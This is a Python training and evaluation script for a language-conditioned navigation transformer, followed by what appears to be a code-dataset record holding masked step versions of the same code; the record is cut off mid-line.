return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f"Training epoch {epoch}...")
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read("train")):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
# skip bad examples
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step+1)
self.scheduler.step_batch(it)
#print(f"step: {step+1} checkpoint_every: {self.checkpoint_every} {(step +1) % self.checkpoint_every}")
if (step+1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.validation_limit)
print(f"Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}")
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f"{epoch}_{step}", is_best)
step += 1
print(f"skipped {skipped} examples")
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.validation_limit)
print(f"Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}")
if self.score_type == "acc":
return (epoch_acc)/2, -1.0
else:
raise AssertionError(f"invalid score type {self.score_type}")
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight = [1.0, 1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs["next_position"]
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
# binarize patches
next_sum_image = torch.sum(true_next_image, dim = 2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
# any patch that has a 1 pixel in it gets 1
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image, next_patches)
total_loss = next_pixel_loss
print(f"loss {total_loss.item()}")
return total_loss
def generate_debugging_image(self,
true_img,
path_state,
pred_path,
out_path,
caption = None,
top_k = None,
threshold = None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2,2, figsize=(16,16))
# gs = gridspec.GridSpec(2, 2, width_ratios=[2, 1])
text_ax = ax[0,1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize = 12)
text_ax.axis("off")
props = dict(boxstyle='round',
facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
# img_ax = plt.subplot(gs[2])
img_ax = ax[1,0]
#w = int(40 * (self.resolution / 224))
true_img = true_img.detach().cpu().numpy().astype(float)[:,:,0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1,1,3)).astype(float)
true_ax = ax[0,0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1,:,:]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape = (512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path<1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1,1,3)).astype(float)
pred_ax = ax[1,1]
pred_ax.imshow(pred_path)
file_path = f"{out_path}.png"
print(f"saving to {file_path}")
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num, top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size, output_type="per-patch", upsample=True)
# f1 metric
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance["path_state"].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs["next_position"].shape[0]):
output_path = self.checkpoint_dir.joinpath(f"batch_{batch_num}").joinpath(f"instance_{i}")
output_path.mkdir(parents = True, exist_ok=True)
command = batch_instance["command"][i]
command = [x for x in command if x != "<PAD>"]
command = " ".join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance["path_state"][i]
pred_path = next_position[i]
self.generate_debugging_image(image,
path_state,
pred_path,
output_path,
caption = command,
top_k = top_k,
threshold = threshold)
return {"next_f1": next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-8
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1-pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1-pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = "cpu"
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f"cuda:{free_gpu_id}"
#device = "cuda:0"
device = torch.device(device)
print(f"On device {device}")
#test = torch.ones((1))
#test = test.to(device)
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir = args.data_dir,
out_path = args.out_path,
path_width = args.path_width,
read_limit = args.read_limit,
batch_size = args.batch_size,
max_len = args.max_len,
tokenizer = tokenizer,
shuffle = args.shuffle,
overfit = args.overfit,
is_bert = "bert" in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath("vocab.json"), "w") as f1:
json.dump(list(train_vocab), f1)
else:
print(f"Reading vocab from {checkpoint_dir}")
with open(checkpoint_dir.joinpath("vocab.json")) as f1:
train_vocab = json.load(f1)
print(f"got data")
# construct the vocab and tokenizer
print(f"constructing model...")
# get the embedder from args
if args.embedder == "random":
embedder = RandomEmbedder(tokenizer, train_vocab, args.embedding_dim, trainable=True)
elif args.embedder == "glove":
embedder = GloveEmbedder(tokenizer, train_vocab, args.embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith("bert"):
embedder = BERTEmbedder(model_name = args.embedder, max_seq_len = args.max_len)
else:
raise NotImplementedError(f"No embedder {args.embedder}")
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size = args.resolution,
patch_size = args.patch_size,
language_embedder = embedder,
n_layers = args.n_layers,
channels = args.channels,
n_heads = args.n_heads,
hidden_dim = args.hidden_dim,
ff_dim = args.ff_dim,
dropout = args.dropout,
embed_dropout = args.embed_dropout,
output_type = args.output_type,
positional_encoding_type = args.pos_encoding_type,
device = device,
log_weights = args.test,
locality_mask = args.locality_mask,
locality_neighborhood = args.locality_neighborhood,
init_scale = args.init_scale)
# Initialize encoder
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
# construct optimizer
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
# scheduler
scheduler = NoamLR(optimizer, model_size = args.hidden_dim, warmup_steps = args.warmup, factor = args.lr_factor)
best_epoch = -1
block_size = int((args.resolution * 4)/64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
# file exists
try:
assert(len(glob.glob(os.path.join(args.checkpoint_dir, "*.th"))) == 0)
except AssertionError:
raise AssertionError(f"Output directory {args.checkpoint_dir} non-empty, will not overwrite!")
else:
# resume from pre-trained
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
# get training info
best_checkpoint_data = json.load(open(pathlib.Path(args.checkpoint_dir).joinpath("best_training_state.json")))
print(f"best_checkpoint_data {best_checkpoint_data}")
best_epoch = best_checkpoint_data["epoch"]
# save arg config to checkpoint_dir
with open(pathlib.Path(args.checkpoint_dir).joinpath("config.yaml"), "w") as f1:
dump_args = copy.deepcopy(args)
# drop stuff we can't serialize
del(dump_args.__dict__["cfg"])
del(dump_args.__dict__["__cwd__"])
del(dump_args.__dict__["__path__"])
to_dump = dump_args.__dict__
# dump
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
# test-time, load best model
print(f"loading model weights from {args.checkpoint_dir}")
#state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"))
#encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.to("cpu")
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath("best.th"), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
# construct trainer
trainer = NavigationTransformerTrainer(dataset_reader = dataset_reader,
encoder = encoder,
optimizer = optimizer,
scheduler = scheduler,
num_epochs = args.num_epochs,
num_blocks = num_blocks,
device = device,
checkpoint_dir = args.checkpoint_dir,
checkpoint_every = args.checkpoint_every,
validation_limit = args.validation_limit,
num_models_to_keep = args.num_models_to_keep,
generate_after_n = args.generate_after_n,
score_type=args.score_type,
depth = depth,
resolution = args.resolution,
output_type = args.output_type,
patch_size = args.patch_size,
block_size = block_size,
best_epoch = best_epoch,
seed = args.seed,
zero_weight = args.zero_weight,
debug_image_top_k = args.debug_image_top_k,
debug_image_threshold = args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f"evaluating")
acc = trainer.evaluate()
print(f"accuracy: {acc}")
if __name__ == "__main__":
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
|
normal
|
{
"blob_id": "04aacf9461ade2e229076ffdf85aca913037edad",
"index": 642,
"step-1": "<mask token>\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = self.compute_patch_loss(small_batch, outputs, self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\n 'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = self.compute_patch_loss(small_batch, outputs, self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\n 'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\ndef main(args):\n device = 'cpu'\n if args.cuda is not None:\n free_gpu_id = get_free_gpu()\n if free_gpu_id > -1:\n device = f'cuda:{free_gpu_id}'\n device = torch.device(device)\n print(f'On device {device}')\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=\n args.out_path, path_width=args.path_width, read_limit=args.\n read_limit, batch_size=args.batch_size, max_len=args.max_len,\n tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,\n is_bert='bert' in args.embedder)\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir()\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath('vocab.json')\n ) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:\n json.dump(list(train_vocab), f1)\n else:\n print(f'Reading vocab from {checkpoint_dir}')\n with open(checkpoint_dir.joinpath('vocab.json')) as f1:\n train_vocab = json.load(f1)\n print(f'got data')\n print(f'constructing model...')\n if args.embedder == 'random':\n embedder = RandomEmbedder(tokenizer, train_vocab, args.\n embedding_dim, trainable=True)\n elif args.embedder == 'glove':\n embedder = GloveEmbedder(tokenizer, train_vocab, args.\n embedding_file, args.embedding_dim, trainable=True)\n elif args.embedder.startswith('bert'):\n embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.\n max_len)\n else:\n raise NotImplementedError(f'No embedder {args.embedder}')\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n encoder_kwargs = dict(image_size=args.resolution, patch_size=args.\n patch_size, language_embedder=embedder, n_layers=args.n_layers,\n channels=args.channels, n_heads=args.n_heads, hidden_dim=args.\n hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout\n =args.embed_dropout, output_type=args.output_type,\n positional_encoding_type=args.pos_encoding_type, device=device,\n log_weights=args.test, locality_mask=args.locality_mask,\n locality_neighborhood=args.locality_neighborhood, init_scale=args.\n init_scale)\n encoder = encoder_cls(**encoder_kwargs)\n if args.cuda is not None:\n encoder = encoder.cuda(device)\n print(encoder)\n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)\n scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=\n args.warmup, factor=args.lr_factor)\n best_epoch = -1\n block_size = int(args.resolution * 4 / 64)\n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n try:\n assert len(glob.glob(os.path.join(args.checkpoint_dir,\n '*.th'))) == 0\n except AssertionError:\n raise AssertionError(\n f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'\n )\n else:\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).\n joinpath('best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n best_checkpoint_data = json.load(open(pathlib.Path(args.\n checkpoint_dir).joinpath('best_training_state.json')))\n print(f'best_checkpoint_data {best_checkpoint_data}')\n best_epoch = best_checkpoint_data['epoch']\n with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),\n 'w') as f1:\n dump_args = copy.deepcopy(args)\n del dump_args.__dict__['cfg']\n del 